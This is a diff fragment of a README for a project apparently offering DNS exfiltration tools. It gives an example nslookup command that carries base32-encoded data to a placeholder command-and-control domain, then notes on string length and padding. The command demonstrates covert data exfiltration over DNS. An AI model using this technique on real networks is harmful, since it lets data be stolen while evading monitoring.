cooploop2663/DNS_Exfil_Tools/README.md

    ```bash
    nslookup KRCVGVCJJZDSAVCFKNKESTSHEAYTEMY.c2.fakedomain.com
    ```
+  **EXTRA NOTE:**
-  Extra Note: The domain string KRCVGVCJJZDSAVCFKNKESTSHEAYTEMY.c2.fakedomain.com contains 49 characters.
-Also the '=' is padded by the script when it recieves it.
+  - The '=' is added by the script when it tries to decrypt it.
+  - The domain string KRCVGVCJJZDSAVCFKNKESTSHEAYTEMY.c2.fakedomain.com contains 49 characters.
 ---

 **Note:** All other tools not documented here are works in progress.